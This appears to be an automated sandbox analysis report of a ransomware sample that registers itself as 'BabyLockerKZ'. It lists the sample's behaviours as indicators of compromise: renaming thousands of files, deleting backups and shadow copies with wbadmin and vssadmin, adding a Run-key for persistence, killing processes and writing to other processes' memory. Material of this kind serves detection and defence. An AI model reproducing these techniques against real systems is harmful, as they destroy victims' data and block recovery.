82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b

pid	Process
4212	bcdedit.exe
3968	bcdedit.exe

Renames multiple (6887) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

Inhibit System Recovery

pid	Process
4024	wbadmin.exe

Deletes system backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

Inhibit System Recovery

pid	Process
564	wbadmin.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe\""	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe\""	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\M:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\K:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\N:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\O:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\R:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\S:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\B:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\G:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\H:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\Z:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\U:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\X:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\Y:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\V:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\I:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\P:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\T:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\J:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\Q:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\W:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\F:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\A:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened (read-only)	\??\E:	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\BreakAndContinue.Tests.ps1	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-400_contrast-black.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-80_altform-lightunplated.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40_contrast-white.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\da.pak.DATA	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\AppxManifest.xml	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-125.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-40_altform-unplated.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-24.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\Spotlight_WinterGames.gif	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\ui-strings.js	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\7-Zip\descript.ion	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\46.jpg	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-400_contrast-white.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\SplashScreen.scale-150.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-125.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-pl.xrm-ms	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-200_contrast-white.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Outlook.scale-100.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-ppd.xrm-ms	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\PREVIEW.GIF	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-256_altform-unplated_contrast-black.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\Xbox360PurchaseControl.xaml	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_selected_18.svg	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\MixedRealityPortalStoreLogo.scale-100.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-32_altform-unplated_contrast-black.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_altform-unplated_contrast-black.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\kb-locked.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-2x.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\ur.pak.DATA	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-96.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-200.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-sl\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-64.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-125.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-48_altform-lightunplated.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-100_contrast-black.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\ui-strings.js	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSplashScreen.contrast-black_scale-100.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\HOW_TO_BACK_FILES.html	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Trust Protection Lists\Mu\Content	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Resources\1033\msmdsrvi_xl.rll	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-48.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxWideTile.scale-150.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluDCFilesEmpty_180x180.svg	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-256_altform-unplated_devicefamily-colorfulunplated.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\VisualElements\LogoCanary.png	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

Inhibit System Recovery

pid	Process
4528	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
456	taskkill.exe
1580	taskkill.exe
3404	taskkill.exe
1152	taskkill.exe
3172	taskkill.exe
1152	taskkill.exe
2324	taskkill.exe
1132	taskkill.exe
3520	taskkill.exe
4340	taskkill.exe
4976	taskkill.exe
3356	taskkill.exe
3452	taskkill.exe
1480	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{584BAB75-B4C2-4A7B-9886-6AB0D10E936E}	explorer.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe
3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeDebugPrivilege	3172	taskkill.exe
Token: SeDebugPrivilege	3356	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeDebugPrivilege	1152	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	3520	taskkill.exe
Token: SeDebugPrivilege	3404	taskkill.exe
Token: SeDebugPrivilege	4340	cmd.exe
Token: SeIncreaseQuotaPrivilege	2340	WMIC.exe
Token: SeSecurityPrivilege	2340	WMIC.exe
Token: SeTakeOwnershipPrivilege	2340	WMIC.exe
Token: SeLoadDriverPrivilege	2340	WMIC.exe
Token: SeSystemProfilePrivilege	2340	WMIC.exe
Token: SeSystemtimePrivilege	2340	WMIC.exe
Token: SeProfSingleProcessPrivilege	2340	WMIC.exe
Token: SeIncBasePriorityPrivilege	2340	WMIC.exe
Token: SeCreatePagefilePrivilege	2340	WMIC.exe
Token: SeBackupPrivilege	2340	WMIC.exe
Token: SeRestorePrivilege	2340	WMIC.exe
Token: SeShutdownPrivilege	2340	WMIC.exe
Token: SeDebugPrivilege	2340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2340	WMIC.exe
Token: SeRemoteShutdownPrivilege	2340	WMIC.exe
Token: SeUndockPrivilege	2340	WMIC.exe
Token: SeManageVolumePrivilege	2340	WMIC.exe
Token: 33	2340	WMIC.exe
Token: 34	2340	WMIC.exe
Token: 35	2340	WMIC.exe
Token: 36	2340	WMIC.exe
Token: SeBackupPrivilege	3744	vssvc.exe
Token: SeRestorePrivilege	3744	vssvc.exe
Token: SeAuditPrivilege	3744	vssvc.exe
Token: SeShutdownPrivilege	4648	explorer.exe
Token: SeCreatePagefilePrivilege	4648	explorer.exe
Token: SeShutdownPrivilege	4648	explorer.exe
Token: SeCreatePagefilePrivilege	4648	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3528 wrote to memory of 1760	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	97
PID 3528 wrote to memory of 1760	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	97
PID 3528 wrote to memory of 1760	3528	82fabe7611dff81affd39733a833c5de9994bce8994fa184535c8b62cf72247b.exe	97
PID 1760 wrote to memory of 4028	1760	cmd.exe	99
PID 1760 wrote to memory of 4028	1760	cmd.exe	99
